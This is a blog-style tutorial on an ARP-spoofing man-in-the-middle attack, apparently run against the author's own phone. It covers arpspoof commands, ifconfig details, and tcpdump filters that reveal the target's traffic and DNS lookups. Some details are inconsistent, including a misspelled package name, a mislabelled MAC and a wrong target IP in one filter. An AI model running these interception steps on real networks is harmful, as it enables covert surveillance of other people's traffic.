2025-03-4 Hacking your Wi-Fi II, MiTM attacks

Today we will be performing a MiTM (Man-in-The-Middle) attack using the dsniff tool suite, lets get started.

Here is our network information

Gateway IP 10.1.1.1 Target IP 10.1.1.121 Attacker IP 10.1.1.182

Step 1 Installing dependencies

Lets start by installing dsniff, I run gentoo linux so I will run

sudo emerge dnsniff

And we should also make sure we have a network sniffer like tcpdump or Wireshark.

This should hopefully come with all of the tools we need to perform the attack, it is quite simple.

Step 2 Running arpspoof

Next we will run our arpspoof tool.

here is the syntax for the command we will run:

sudo arpspoof -i <INTERFACE> -t <TARGET> <GATEWAY>

To find our interface and MAC lets run ifconfig, I know my wireless interface is called wlan0 so I will find this field in the output.

Here we see:

wlan0: flags=4419<UP,BROADCAST,RUNNING,PROMISC,MULTICAST>  mtu 1500
    inet 10.1.1.182  netmask 255.255.255.0  broadcast 10.0.0.255
    ether b8:1e:a4:61:01:ab  txqueuelen 1000  (Ethernet)

Note

I removed most lines just to show the important information

Now that we have noted our IP, MAC and interface we will run arpspoof.

with the proper arguments passed we can run sudo arpspoof -i wlan0 -t 10.1.1.121 10.1.1.1

If everything is working successfully, we should see some output similar this:

b8:1e:a4:61:1:ab 8a:5e:a1:4:ec:cd 0806 42: arp reply 10.1.1.1 is-at b8:1e:a4:61:1:ab
b8:1e:a4:61:1:ab 8a:5e:a1:4:ec:cd 0806 42: arp reply 10.1.1.1 is-at b8:1e:a4:61:1:ab

Here we see my computers MAC address (8a:5e:a1:4:ec:cd) now points to the gateway 10.1.1.1.

Step 3 Filtering and monitoring

We can run sudo tcpdump -i wlan0 host 10.1.1.121 and not arp to monitor the victim (my phone), here is some example output:

Note

I filtered out arp requests since we can see them in our arpspoof output

14:38:41.865299 IP 10.1.1.121.mdns > mdns.mcast.net.mdns: 0 PTR (QM)? _spotify-connect._tcp.local. (45)
14:38:41.865922 IP 10.1.1.121.XXXXX > 239.255.255.250.1900: UDP, length 125
14:38:43.913433 IP 10.1.1.121.mdns > mdns.mcast.net.mdns: 0 PTR (QM)? _spotify-connect._tcp.local. (45)
14:38:43.914014 IP 10.1.1.121.XXXXX > 239.255.255.250.1900: UDP, length 125
14:38:45.820351 IP 10.1.1.121.XXXXX > 30.224.186.35.bc.googleusercontent.com.https: Flags [FP.], seq XXXXXXXX:XXXXXXXX, ack XXXXXXXX, win XX, options [nop,nop,TS val XXXXXXXXX ecr XXXXXXXXX], length 569
14:38:45.961503 IP 10.1.1.121.mdns > mdns.mcast.net.mdns: 0 PTR (QM)? _spotify-connect._tcp.local. (45)
14:38:45.962058 IP 10.1.1.121.XXXXX > 239.255.255.250.1900: UDP, length 125
14:38:46.077329 IP 10.1.1.121.XXXXX > 9.224.186.35.bc.googleusercontent.com.https: Flags [FP.], seq XXXXXXXX:XXXXXXXX, ack XXXXXXXX, win XX, options [nop,nop,TS val XXXXXXXXX ecr XXXXXXXXX], length 577
14:38:46.167247 IP 10.1.1.121.mdns > mdns.mcast.net.mdns: 0 PTR (QM)? _spotify-social-listening._tcp.local. (54)

Here we see some requests being made by my phone, we can see the target is listening to spotify. We can also filter only DNS requests and monitor which sites the victim is visiting.

Lets run

sudo tcpdump -i wlan0 host 10.1.1.199 and port 53

Here we see every site my phone visits!

listening on wlan0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
15:01:31.084186 IP 10.1.1.121.58664 > 10.1.1.1.domain: 12467+ A? www.google.com. (32)
15:01:36.042848 IP 10.1.1.121.48772 > 10.1.1.1.domain: 59773+ A? www.google.com. (32)
15:01:40.999410 IP 10.1.1.121.13959 > 10.1.1.1.domain: 40908+ A? improving.duckduckgo.com. (42)
15:01:41.014103 IP 10.1.1.121.48772 > 10.1.1.1.domain: 59773+ A? www.google.com. (32)
15:01:43.065248 IP 10.1.1.121.30781 > 10.1.1.1.domain: 27373+ A? api.account.samsung.com. (41)
15:01:43.454198 IP 10.1.1.121.30847 > 10.1.1.1.domain: 14313+ A? fonts.googleapis.com. (38)
15:01:43.775948 IP 10.1.1.121.44489 > 10.1.1.1.domain: 12907+ A? fonts.gstatic.com. (35)
15:01:45.073988 IP 10.1.1.121.31649 > 10.1.1.1.domain: 60754+ A? asrch.org. (27)
15:01:45.197287 IP 10.1.1.121.18580 > 10.1.1.1.domain: 21491+ A? www.asrch.org. (31)
15:01:45.979170 IP 10.1.1.121.13959 > 10.1.1.1.domain: 40908+ A? improving.duckduckgo.com. (42)
15:01:46.034599 IP 10.1.1.121.10505 > 10.1.1.1.domain: 14048+ A? www.google.com. (32)
15:01:48.071785 IP 10.1.1.121.30781 > 10.1.1.1.domain: 27373+ A? api.account.samsung.com. (41)
15:01:48.456325 IP 10.1.1.121.30847 > 10.1.1.1.domain: 14313+ A? fonts.googleapis.com. (38)
15:01:48.782880 IP 10.1.1.121.44489 > 10.1.1.1.domain: 12907+ A? fonts.gstatic.com. (35)
15:01:49.478537 IP 10.1.1.121.31587 > 10.1.1.1.domain: 4311+ A? fonts.googleapis.com. (38)